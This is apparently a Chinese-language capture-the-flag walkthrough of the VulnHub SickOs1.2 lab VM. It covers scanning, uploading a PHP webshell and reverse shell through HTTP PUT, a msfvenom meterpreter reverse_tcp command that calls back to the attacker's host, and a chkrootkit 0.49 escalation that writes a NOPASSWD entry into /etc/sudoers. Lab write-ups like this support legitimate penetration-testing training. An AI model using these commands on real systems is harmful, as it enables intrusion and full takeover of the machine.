kali渗透综合靶机(十二)--SickOs1.2靶机

一、靶机下载

下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip

二、SickOs1.2靶机搭建

将下载好的靶机环境,用VMware导入即可使用,文件->打开
在这里插入图片描述
在这里插入图片描述
导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可
在这里插入图片描述
在这里插入图片描述

三、攻击过程

kali IP:192.168.212.6
靶机IP:192.168.212.9

1、主机发现

nmap -sn 192.168.212.0/24
在这里插入图片描述

2、端口扫描

方法一:
在这里插入图片描述
方法二:
在这里插入图片描述

3、端口服务识别

在这里插入图片描述

4、漏洞查找与利用

浏览器访问,没有发现任何有用信息
在这里插入图片描述
目录扫描
在这里插入图片描述
发现http://192.168.212.9/test/
在这里插入图片描述
发现ssh的版本OpenSSH 5.9p1,存在用户枚举漏洞,用msf枚举用户得到用户John, root
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
使用hydra进行ssh爆破,没有破解出来

发现web服务的版本lighttpd 1.4.28
searchsploit lighttpd,搜索漏洞,发现没有什么可利用的漏洞
在这里插入图片描述
nmap 192.168.10.170 --script=http-methods.nse --script-args=http.methods.url-path="/test" 扫描/test页面的支持的http方法
在这里插入图片描述
或者对/test页面抓包,然后修改请求头为OPTIONS查看支持的HTTP方法
在这里插入图片描述
测试PUT方法(注意数据包中的每一个空格都不要修改,否则有可能上传失败)
上传了一个html文件进行测试,发现真的上传成功了(上传一个不存在的文件会响应201 Created)
在这里插入图片描述
在这里插入图片描述

Getshell方式一:

上传php一句话
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
.在菜刀中上传php反弹shell,反弹连接的IP以及端口,端口设置为443(防火墙阻止了非常用端口出去)
将反弹shell文件复制到桌面,修改IP地址及端口号
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
kali打开监听端口,浏览器访问shell文件
在这里插入图片描述
在这里插入图片描述
查看系统版本和内核版本
在这里插入图片描述
在这里插入图片描述

Getshell方式二

Msfvenom生成一个反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=443 > shell443.php
在这里插入图片描述
curl上传生成的反弹shell到目标
在这里插入图片描述
在Kali测试机上打开msfconsole,exploit/multi/handler模块,指定IP和端口进行监听,然后放到后台。
在这里插入图片描述
在这里插入图片描述
浏览器访问shell文件
在这里插入图片描述
成功返回shell
在这里插入图片描述

提权方式一:利用exp

查看靶机服务器和版本信息
在这里插入图片描述
在这里插入图片描述
或者查看系统是否存在chkrootkit,发现chkrootkit的版本为0.49
在这里插入图片描述

chkrootkit 0.49漏洞原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。如果攻击者知道管理员是定期运行chkrootkit(通过查看cron.daily获知),并且对/ tmp(没有挂载noexec)有写访问权限,就可以利用该漏洞获取root权限。

漏洞利用: 于是我们可以利用这一点,在/tmp目录下新建update文件,做我们想让root帮我们做的事

touch /tmp/update
chmod +x /tmp/update
添加当前用户www-data到sudoers列表中;
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers’ > /tmp/update
sudo su root
在这里插入图片描述
过一会儿后切换root账户,成功
在这里插入图片描述

提权方式二

exploit-database中对漏洞chkrootkit进行搜索
在这里插入图片描述
msf中利用对应的漏洞结合已经获得的session
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结

1、信息收集、端口扫描、服务识别、目录扫描
2、nmap 的http-methods.nse脚本获得目标支持的http方法,发现/test页面支持put方法
3、使用burp修改包,用put方法上传一句话或者curl 上传获得shell
4、利用chkrootkit版本0.49定期以root身份执行/tmp/update文件来提权。
  1.利用msf中chkrootkit攻击模块
  2.手动创建在/tmp创建update文件,然后利用自动执行update文件,在update写入添加账户到sudo组

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述